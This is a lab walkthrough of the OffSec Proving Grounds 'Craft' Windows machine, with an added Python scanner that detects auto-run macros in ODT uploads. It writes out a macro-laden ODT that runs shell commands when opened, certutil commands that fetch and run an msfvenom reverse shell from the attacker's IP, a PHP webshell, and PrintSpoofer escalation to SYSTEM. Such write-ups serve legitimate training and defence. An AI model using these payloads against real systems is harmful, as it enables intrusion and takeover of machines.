Craft Walkthrough - Proving Grounds (OffSec)
I wanted to do another Windows machine, as I've been trying to keep up my skills on Windows and not just Linux. I ran an nmap scan and saw only one open port, port 80, which was running a web server. The nmap script and version scans gave no real information, so I opened my web browser and navigated to the page.
I scrolled to the bottom of the page and noticed there was an upload button. I wanted to investigate this further, so I tried uploading a php webshell to see if I could gain access that way.
As you can see, the php webshell was not uploaded. Thankfully the server is very helpful to us as hackers and states the file type it expects, so we know what to change in order to get a shell. It only accepts ODT files, the document format of OpenOffice/LibreOffice (the open-source office suite, effectively the Linux version of Microsoft Word, Excel, PowerPoint, etc.). I opened OpenOffice, created a new document and named it "pingback.odt". From there I went to Tools > Macros > Organize Macros > Basic.
I then went to the Main sub in Module1 of my document and added a simple ping command, run through the system shell. The intent was to test for RCE by pinging my attack machine once: if I captured that ping, I would know I had RCE and could run any command I wanted.
REM ***** BASIC *****
Sub Main
Shell("cmd /c ping -n 1 192.168.45.160")
End Sub
I then saved the macro and exited the macro building page. I then went to Tools > Customize. From there I clicked on the Events tab and clicked on the "Open Document" option and selected "Assign: Macro".
I then selected the macro I just made and clicked ok.
I saved the document and closed OpenOffice. I then ran tcpdump to capture all of the traffic on the tun0 interface to ensure I could see any ping requests.
sudo tcpdump -i tun0 icmp
I uploaded the pingback.odt file that I just made to the website, and it worked this time. It said that my document would be reviewed shortly. I was hoping the "person" reviewing would click on our document. A few seconds later I noticed a ping request and ping reply back to the server!
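From the defending side, the upload handler could inspect every ODT before a reviewer opens it, since the whole attack rests on a macro bound to the Open Document event. The scanner below is an added example, not code from the original post: it unzips the ODT, flags any macro bound to a document event in content.xml (dom:load is assumed here to be the ODF event name behind "Open Document") and any embedded Basic module that calls Shell or similar, and the document it builds for testing is a constructed stand-in for pingback.odt rather than a real capture.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

# ODF namespaces used for event bindings and Basic modules (from the OpenDocument spec).
NS = {"office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
      "script": "urn:oasis:names:tc:opendocument:xmlns:script:1.0",
      "xlink": "http://www.w3.org/1999/xlink"}
# Basic calls that spawn programs or instantiate objects; any hit deserves a manual look.
RISKY = re.compile(r"\b(Shell|Exec|CreateObject|CreateUnoService)\s*\(", re.I)

def scan_odt(data: bytes) -> dict:
    """Report auto-run event bindings, embedded Basic modules and risky calls in an ODT."""
    rep = {"auto_events": [], "macro_modules": [], "risky_calls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Bindings made under Tools > Customize > Events are serialised into content.xml.
        if "content.xml" in names:
            root = ET.fromstring(z.read("content.xml"))
            for el in root.iterfind(".//script:event-listener", NS):
                href = el.get("{%s}href" % NS["xlink"], "")
                if href.startswith("vnd.sun.star.script:"):  # macro stored in the document itself
                    rep["auto_events"].append((el.get("{%s}event-name" % NS["script"]), href))
        # Basic source lives at Basic/<Library>/<Module>.xml; script-lc/lb.xml are only indexes.
        for n in names:
            if n.startswith("Basic/") and n.endswith(".xml") and "script-l" not in n:
                rep["macro_modules"].append(n)
                src = z.read(n).decode("utf-8", "replace")
                rep["risky_calls"] += [(n, m.group(1)) for m in RISKY.finditer(src)]
    return rep

def is_suspicious(rep: dict) -> bool:
    # Quarantine when a macro is wired to fire on its own or reaches outside the document.
    return bool(rep["auto_events"] or rep["risky_calls"])

def build_sample_odt(macro_src: str, autorun: bool) -> bytes:
    """Constructed minimal ODT (stand-in for pingback.odt) with one Basic module; not a real capture."""
    listener = ('<script:event-listener script:event-name="dom:load" xlink:href="vnd.sun.star.script:'
                'Standard.Module1.Main?language=Basic&amp;location=document"/>') if autorun else ""
    content = ('<office:document-content xmlns:office="%s" xmlns:script="%s" xmlns:xlink="%s">'
               '<office:scripts><office:event-listeners>%s</office:event-listeners></office:scripts>'
               '</office:document-content>' % (NS["office"], NS["script"], NS["xlink"], listener))
    module = ('<script:module xmlns:script="%s" script:name="Module1" script:language="StarBasic">'
              '%s</script:module>' % (NS["script"], macro_src))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content)
        z.writestr("Basic/Standard/Module1.xml", module)
    return buf.getvalue()
```

A document with a macro but no event binding and no risky call is reported but not quarantined, so legitimate macro-bearing documents are not blocked outright.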
Once I saw this, I knew what I needed to do. I needed to craft a reverse shell, set up a listener and make the user download and run the reverse shell. So I crafted up an msfvenom shell.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.160 LPORT=443 -f exe > shell.exe
After that, I set up a netcat listener on port 443, and set up an http server on port 80 using python3 in order to download the reverse shell onto the target. I then went back and edited the pingback.odt file to adjust the macro to run a command to download the reverse shell .exe file and then another command to execute the .exe file.
REM ***** BASIC *****
Sub Main
Shell("cmd /c certutil.exe -urlcache -split -f 'http://192.168.45.160/shell.exe' 'C:\Windows\Temp\shell.exe'")
Shell("cmd /c 'C:\Windows\Temp\shell.exe'")
End Sub
I uploaded the newly modified file to the web page and waited for a few seconds. Not long after uploading I noticed there was a GET request from the server to get the shell.exe file! Right after I saw that I got a reverse shell on the machine.
I checked to see what account I was on, and it was "thecybergeek". I then immediately grabbed PowerUp.ps1 and winPEAS for Windows to see if I could automatically find any priv esc vectors.
certutil -urlcache -f http://192.168.45.160/PowerUp.ps1 "C:\Users\thecybergeek\Desktop\PowerUp.ps1"
certutil -urlcache -f http://192.168.45.160/winPEASany.exe "C:\Users\thecybergeek\Desktop\winPEASany.exe"
I ran Invoke-AllChecks from PowerUp, but didn't see anything useful. I then ran winPEAS, but nothing jumped out immediately either. I looked and thought about it for quite some time. I then started thinking about moving to another account, as I saw there was an apache account with a user ID of 1000, whereas my current user's ID was 1001. I wanted to see whether it had more privileges than I did.
I then noticed that I had write privileges in some directories inside the XAMPP directory from which the Apache server was being run.
I didn't see anything in that specific folder that I could leverage, so I backtracked to the htdocs folder, where the server hosts the actual web pages. I ran icacls on it and confirmed I had write privileges there. I knew this was my avenue to the apache user: I just needed to upload a php webshell to this directory and access it from my browser.
I downloaded the webshell using certutil and then accessed the file on my web browser.
certutil -urlcache -f http://192.168.45.160/wshell.php "C:\xampp\htdocs\wshell.php"
I checked to make sure I was the apache user, which I was. I then wanted to see if my suspicions were correct in that the apache user had more privileges than the previous account obtained.
As soon as I saw SeImpersonatePrivilege enabled, I knew exactly what I needed to do to obtain SYSTEM. I set up a netcat listener on port 443. I then downloaded the same msfvenom shell.exe I had made earlier, along with PrintSpoofer.exe, to the target machine using certutil. I could have simply uploaded them to the same directory through the webshell I had, but if your webshell doesn't offer that, certutil is a simple way to get the executables onto the machine.
certutil -urlcache -f http://192.168.45.160/PrintSpoofer.exe "C:\xampp\htdocs\PrintSpoofer.exe"
certutil -urlcache -f http://192.168.45.160/shell.exe "C:\xampp\htdocs\shell.exe"
From there, I simply ran the following command to get a reverse shell.
PrintSpoofer.exe -i -c shell.exe
I checked my listener, and sure enough, I had a reverse shell as SYSTEM.
Overall this box definitely earned its intermediate rating. It wasn't terribly difficult, but it did make me think outside the box. Some key takeaways for me to remember are to look at other accounts during priv esc; I sometimes forget to do this, and lateral movement on the same machine is sometimes the key. Another is not to rely entirely on automated tools to provide the answers. WinPEAS and PowerUp did not really give me anything here; I had to think about what I already had in order to make the next move. Sometimes we get too reliant on these automated scripts and don't see what's right in front of us when they come up empty. This was a fun box to do and it definitely helped to brush up my skill set.
-Sam